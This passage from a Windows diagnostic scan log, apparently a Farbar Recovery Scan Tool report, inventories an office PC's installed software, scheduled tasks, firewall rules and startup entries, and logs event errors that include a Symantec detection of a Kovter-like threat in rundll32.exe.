(HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\JoinMe) (Version: 1.9.1.204 - LogMeIn, Inc.) Logitech Unifying Software 1.00 (HKLM\...\Logitech Unifying) (Version: 1.00.127 - Logitech) LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) MarketResearch (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft IntelliType Pro 8.2 (HKLM\...\Microsoft IntelliType Pro 8.2) (Version: 8.20.469.0 - Microsoft Corporation) Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MS Word Employment Application Template Software (HKLM-x32\...\MS Word Employment Application Template Software_is1) (Version: - Sobolsoft) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden Network64 (Version: 140.0.221.000 - Hewlett-Packard) Hidden OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software) Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden Print Tracker (HKLM-x32\...\Print Tracker_is1) (Version: - Really Impressive Products, LLC) Product Improvement Study for HP Deskjet 2540 series (HKLM\...\{2302D958-4F1E-469A-8A90-15C321320C71}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.) Product Improvement Study for HP Officejet Pro 8610 (HKLM\...\{D2064264-3162-4DB1-AFE0-167BEFBBCD9C}) (Version: 32.3.198.49673 - Hewlett-Packard Co.) ProductContext (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5841 - Realtek Semiconductor Corp.) Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version: - Roadkil.Net) Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) SmartWebPrinting (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden Smilebox (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Smilebox) (Version: - ) SolutionCenter (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden Status (x32 Version: 140.0.256.000 - Hewlett-Packard) Hidden Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation) The Print Shop 2.0 Professional (HKLM-x32\...\{159E3ACF-7D79-49A1-A085-9F53B0738C65}) (Version: 2.00.0000 - Encore) The Print Shop 3.0 Deluxe (HKLM-x32\...\{A5154F2B-09F9-40A3-8CA5-B581CA9766C5}) (Version: 1.00.0000 - Encore Software, Inc.) The Print Shop 3.0 Fonts (HKLM-x32\...\{2C3060F6-F0DC-4F63-A70F-2070BE57EEDC}) (Version: 1.0 - Encore) The Print Shop 3.5 Fonts (HKLM-x32\...\{B6D7C4E3-27FB-4937-B1F3-9B26C5D2A65A}) (Version: 1.0 - Encore) The Print Shop 3.5 Professional (HKLM-x32\...\{54BBB71F-59C7-4F1B-B08A-7908D4ED3A2B}) (Version: 1.00.0000 - Encore) Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden TrayApp (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden Trend Micro Worry-Free Business Security Agent (x32 Version: 1.0.0 - Trend Micro Incorporated) Hidden WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation) Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp) Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation) Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation) WordPerfect Office X3 (HKLM-x32\...\_{83FBD495-DDF6-4C8D-92D6-10261DD6F6A3}) (Version: - Corel Corporation) WordPerfect Office X3 (x32 Version: 13.3 - Corel Corporation) Hidden Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.70.25 - Zemana Ltd.) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {245CD879-2842-422F-867B-DA8E3DF4B8EA} - System32\Tasks\HPCustParticipation HP Officejet Pro 8610 => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP) Task: {382A1033-1434-4011-8A0A-528FE84E942A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.) Task: {6AFD2FFF-BB51-4CE5-998A-D02855A23969} - System32\Tasks\{3F506071-F11E-4C0B-96B7-E75E0CE71562} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] () Task: {6F7B3DA7-5C81-42D1-AAD4-E18FCF6E683E} - System32\Tasks\{C8E68830-7E17-4851-AABF-7A4BDB33E408} => pcalua.exe -a "C:\Program Files (x86)\The Weather Channel\The Weather Channel App\TheWeatherChannelCustomUninstall.exe" Task: {76F492E8-4B04-431F-98ED-1B67F05F6858} - System32\Tasks\HPCustParticipation HP Deskjet 2540 series => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPCustPartic.exe [2013-02-08] (Hewlett-Packard Co.) Task: {A177D0B5-D3BF-403E-8DA1-24A0048C0F82} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.) Task: {ABE9B009-3F74-4365-BCFA-1E18A1FD5C02} - System32\Tasks\Microsoft_Hardware_Launch_IType_exe => c:\Program Files\Microsoft IntelliType Pro\IType.exe [2011-08-10] (Microsoft Corporation) Task: {BC872F32-F800-4657-A412-6BFD3D112486} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.) Task: {C91051DC-C003-41F3-A158-EFD4AC8C6F0D} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2014-09-15] () Task: {CD181832-44D0-4403-A423-C9A093D3E763} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated) Task: {CF5A98A5-FD07-4166-90D3-F61641768CC1} - System32\Tasks\{6D13831B-383D-46E9-9BCC-BB932C054E2C} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] () (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\Reception\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4242a155fcc27c2b\FlashPeak Slimjet.lnk -> C:\Program Files (x86)\Slimjet\slimjet.exe (FlashPeak Inc.) -> --profile-directory=Default ==================== Loaded Modules (Whitelisted) ============== 2016-07-05 14:23 - 2016-07-05 14:23 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2016-07-05 14:23 - 2016-07-05 14:23 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2016-11-14 07:53 - 2016-11-14 07:53 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe 2006-11-02 19:40 - 2006-11-02 19:40 - 00174656 _____ () C:\Windows\SysWOW64\PSIService.exe 2016-12-07 05:16 - 2016-12-07 05:16 - 00152944 _____ () C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll 2009-07-13 16:03 - 2009-07-13 20:15 - 00364544 _____ () C:\Windows\SysWOW64\msjetoledb40.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2016-12-07 05:37 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\s-1-5-21-1158510682-2263174364-945799988-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\thepclink\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Control Panel\Desktop\\Wallpaper -> C:\Users\clayton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\Control Panel\Desktop\\Wallpaper -> C:\Users\dcreery\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\Control Panel\Desktop\\Wallpaper -> C:\Users\blagler\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\Wallpaper -> C:\Users\Reception\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.0.105 - 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start Pervasive PSQL Workgroup Engine.lnk => C:\Windows\pss\Start Pervasive PSQL Workgroup Engine.lnk.CommonStartup MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe" MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe" MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: FromDocToPDF EPM Support => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65medint.exe" T8EPMSUP.DLL,S MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe MSCONFIG\startupreg: IgfxTray => C:\Windows\system32\igfxtray.exe MSCONFIG\startupreg: itype => "c:\Program Files\Microsoft IntelliType Pro\itype.exe" MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe MSCONFIG\startupreg: Print Monitor => "C:\Program Files (x86)\Print Tracker\PMonitor.exe" /AsUser MSCONFIG\startupreg: QuickFinder Scheduler => "C:\Program Files (x86)\WordPerfect Office X3\Programs\QFSCHD130.EXE" MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe MSCONFIG\startupreg: Skytel => C:\Program Files\Realtek\Audio\HDA\Skytel.exe ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [TCP Query User{82CC6A84-0F65-47EA-8BE3-F207CA244A2C}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe FirewallRules: [UDP Query User{F8BCDB72-BF90-4CE2-9BF9-1F4B8BB7D292}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe FirewallRules: [{56BBE8D5-557C-483C-A36E-4694A337C99F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{A4AC4264-384E-41D6-AE48-36C847FD9539}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{3127FC7D-4D1B-455D-B7FD-41CABFC6B21C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{FCEEA91D-AE9E-479A-BE17-030E83DE8281}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{4063CEB6-2A45-4A28-AFF2-292C9B3E6DCF}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{2570D9B0-C167-4D49-A8CA-DB43E258CA88}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe FirewallRules: [{BF1156BA-9B51-48C7-B6E0-A68BCFD0641A}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe FirewallRules: [{AB1BA386-08EA-4CB3-9290-169EF3FC7956}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{FC73E6D9-AF81-4BA0-A837-67869A303783}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe FirewallRules: [{86410668-EC09-4E8F-AA57-37BE1A7B9E56}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{CF6F3B7A-5FFE-4857-A35C-5056D09FEB34}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe FirewallRules: [{4C8EF354-5132-43C1-98AA-D5A2B10A5B9F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe FirewallRules: [{2C19E4F3-E543-4376-ABB5-70AA0A2A3178}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{BA01ACB9-72F5-4449-BE99-062BA48EC933}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{E96100CC-BA53-41AA-8CAE-4E9E87F8E1B0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{8BE0A430-C8F8-4B3F-BBAF-4B30FA8F4FC7}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{50745699-4E20-4E3C-832B-1E6A05ED30E7}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{A1CEF5E6-3D62-42F7-B10F-3EE826F69F35}] => C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe FirewallRules: [{CFE82968-778D-404A-8383-E4B132C83C1C}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe FirewallRules: [{FE5A9F0F-64E5-43A5-B74D-4267BA445714}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe FirewallRules: [{792D535E-6928-4608-AB87-7EAC62FCFAD9}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetup.exe FirewallRules: [{DF705928-FDE8-4C27-93B5-159AA18EE903}] => LPort=5357 FirewallRules: [{8036A550-984E-4D16-A1BA-56A200E03D1A}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [TCP Query User{EC49BD0F-52D9-4B49-9730-1B4F69FE6296}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe FirewallRules: [UDP Query User{91FAA043-EAF2-48B8-A853-F19E71692E51}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe FirewallRules: [{5010814D-4D26-4D7F-8B80-2D90CF068D4D}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe FirewallRules: [{E54FEB7B-9565-41DA-85DC-E1FD68D6247E}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe FirewallRules: [{B9D0A4E9-E6F9-4146-8B03-67C75D8B4F51}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe FirewallRules: [{7F3D2F9D-D014-4F5A-8CBA-3FBD39FD23D8}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe FirewallRules: [{44ECC4F7-DA04-49D9-854A-01A39B01C141}] => C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{DA3C61ED-20F4-4287-B397-8CA879900055}] => C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{077B6AE8-63F5-4122-A822-4D12160FAA23}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{FC758905-E8A3-431E-A498-DD8694753456}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{22F46C83-35C6-4AA0-B038-180F477DCBFE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\FaxApplications.exe FirewallRules: [{11096C12-C565-4CE1-B681-C4F76663EF49}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\DigitalWizards.exe FirewallRules: [{5204B832-817F-4173-9CE2-0D69EBBDC6AE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\SendAFax.exe FirewallRules: [{44E5427D-1340-4119-B492-CBED58B9C1F1}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\DeviceSetup.exe FirewallRules: [{129E950C-8BB0-420D-85EA-7208EF2C3D43}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{D5D458D6-78D8-41E9-B965-9ACCD3323D44}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{396FFEC3-E353-4DCE-9F52-20C78D68CE90}] => C:\Program Files\iTunes\iTunes.exe FirewallRules: [TCP Query User{52AF0EF5-B842-4C97-BB7E-5B8DC02D3EA3}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe FirewallRules: [UDP Query User{6D52537C-A62A-4A8D-AAF5-02DCDC7B910C}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe FirewallRules: [{A4391F3D-FD04-44C9-9AD0-384F184595D4}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 08-11-2016 15:49:23 Installed LogMeIn 08-11-2016 16:07:12 Installed LogMeIn 09-11-2016 16:53:11 Windows Update 02-12-2016 04:48:22 Scheduled Checkpoint 05-12-2016 12:04:32 Restore Operation ==================== Faulty Device Manager Devices ============= Name: Photosmart Plus B210 series Description: Photosmart Plus B210 series Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Photosmart 7510 series Description: Photosmart 7510 series Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Officejet Pro 8610 Description: HP Officejet Pro 8610 Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Officejet Pro 8610 Description: HP Officejet Pro 8610 Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors: ================== Error: (12/06/2016 04:46:41 PM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied Error: (12/06/2016 04:43:38 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479 Faulting module name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479 Exception code: 0xc0000005 Fault offset: 0x0019226f Faulting process id: 0xa3c Faulting application start time: 0x01d25008cc7a700a Faulting application path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE Faulting module path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE Report Id: 0b9bdde8-bbfd-11e6-8bb4-00270e34bb77 Error: (12/06/2016 04:35:06 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (12/06/2016 04:30:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Explorer.exe version 6.1.7601.23537 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19f0 Start Time: 01d24fb2095acdfb Termination Time: 60000 Application Path: C:\Windows\Explorer.exe Report Id: 19b15be4-bbfb-11e6-8bb5-00270e34bb77 Error: (12/06/2016 04:26:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program EXCEL.EXE version 14.0.7176.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 27d4 Start Time: 01d25004559b8057 Termination Time: 34332 Application Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE Report Id: 9868f99d-bbfa-11e6-8bb5-00270e34bb77 Error: (12/06/2016 11:44:38 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19e8 Start Time: 01d24fdfce7ba9bc Termination Time: 60000 Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe Report Id: 14e9b3ad-bbd3-11e6-8bb5-00270e34bb77 Error: (12/06/2016 11:37:12 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 2334 Start Time: 01d24fdebc3fce12 Termination Time: 76 Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe Report Id: 2abd62c7-bbd2-11e6-8bb5-00270e34bb77 Error: (12/06/2016 08:01:22 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program OUTLOOK.EXE version 14.0.7172.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19d0 Start Time: 01d24fbfb71c285a Termination Time: 9518 Application Path: C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE Report Id: 05e67684-bbb4-11e6-8bb5-00270e34bb77 Error: (12/06/2016 07:50:30 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: ) Description: A problem prevented Customer Experience Improvement Program data from being sent to Microsoft, (Error 80004005). Error: (12/06/2016 05:52:41 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied System errors: ============= Error: (12/07/2016 05:35:16 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 40. Error: 